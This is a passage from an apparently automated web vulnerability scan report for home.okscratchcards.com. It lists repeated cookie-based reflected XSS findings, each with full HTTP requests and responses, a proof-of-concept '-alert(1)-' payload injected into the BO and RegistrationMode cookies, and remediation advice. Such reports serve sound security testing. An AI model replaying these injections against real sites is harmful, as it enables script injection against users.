Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM51939"-alert(1)-"91ead81e5ee; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM51939"-alert(1)-"91ead81e5ee; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM51939"-alert(1)-"91ead81e5ee";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.88. http://home.okscratchcards.com/Responsible.aspx [BO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1ace"-alert(1)-"2c707f54abb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMa1ace"-alert(1)-"2c707f54abb; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: BO=FMa1ace"-alert(1)-"2c707f54abb; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40941


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa1ace"-alert(1)-"2c707f54abb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.89. http://home.okscratchcards.com/Responsible.aspx [RegistrationMode cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c84ee"-alert(1)-"d1b4367f894 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMc84ee"-alert(1)-"d1b4367f894; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc84ee"-alert(1)-"d1b4367f894; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40941


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc84ee"-alert(1)-"d1b4367f894";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.90. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [BO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f3ae"-alert(1)-"71c4f817bc was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM2f3ae"-alert(1)-"71c4f817bc; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: BO=FM2f3ae"-alert(1)-"71c4f817bc; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2f3ae"-alert(1)-"71c4f817bc";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.91. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7b33"-alert(1)-"217dc5d8aff was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMb7b33"-alert(1)-"217dc5d8aff; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb7b33"-alert(1)-"217dc5d8aff; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34424


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb7b33"-alert(1)-"217dc5d8aff";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.92. http://home.okscratchcards.com/Terms.aspx [BO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ebe8"-alert(1)-"bda4796c29a was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM4ebe8"-alert(1)-"bda4796c29a; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: BO=FM4ebe8"-alert(1)-"bda4796c29a; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97835


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4ebe8"-alert(1)-"bda4796c29a";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.93. http://home.okscratchcards.com/Terms.aspx [RegistrationMode cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25b68"-alert(1)-"b52c242e1ba was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM25b68"-alert(1)-"b52c242e1ba; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM25b68"-alert(1)-"b52c242e1ba; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97835


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM25b68"-alert(1)-"b52c242e1ba";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.94. http://home.okscratchcards.com/help.aspx [BO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f790"-alert(1)-"75a755f3e70 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM7f790"-alert(1)-"75a755f3e70; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: BO=FM7f790"-alert(1)-"75a755f3e70; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7f790"-alert(1)-"75a755f3e70";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.95. http://home.okscratchcards.com/help.aspx [RegistrationMode cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af511"-alert(1)-"3a9f6fdf6e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMaf511"-alert(1)-"3a9f6fdf6e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMaf511"-alert(1)-"3a9f6fdf6e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMaf511"-alert(1)-"3a9f6fdf6e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.96. http://okscratchcards.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://okscratchcards.com
Path:   /

Issue detail

